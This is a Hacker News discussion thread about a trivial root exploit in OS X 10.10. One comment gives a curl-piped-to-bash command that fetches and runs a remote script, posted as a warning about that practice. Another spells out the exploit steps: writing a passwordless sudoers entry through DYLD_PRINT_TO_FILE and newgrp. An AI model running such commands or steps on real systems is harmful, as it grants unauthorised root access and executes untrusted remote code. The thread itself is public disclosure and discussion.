Get root on an OS X 10.10 Mac: The exploit is so trivial it fits in a tweet (theregister.co.uk) 24 points by nchelluri 10y ago ↗ HN
[–] nchelluri 10y ago ↗ There was an earlier discussion here: https://news.ycombinator.com/item?id=9934428I think it was flagged because it used some social media tracking URL instead of the original...Here's my post from that thread:I like to think of this as a good example of why not to use curl to execute bash scripts. curl -s https://raw.githubusercontent.com/nchelluri/rootyourself/master/doh.sh | bash
[–] gcb0 10y ago ↗ anyone has any explanation?apparently it 1. sets `DYLD_PRINT_TO_FILE=/etc/sudoers` on the env, 2. run `newgrp` 3. and pass in `'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3'` as input to it. everything seems innocuous and properly escaped as to not trigger anything bad...
2 comments
[ 3.1 ms ] story [ 11.5 ms ] threadI think it was flagged because it used some social media tracking URL instead of the original...
Here's my post from that thread:
I like to think of this as a good example of why not to use curl to execute bash scripts.
apparently it
everything seems innocuous and properly escaped as to not trigger anything bad...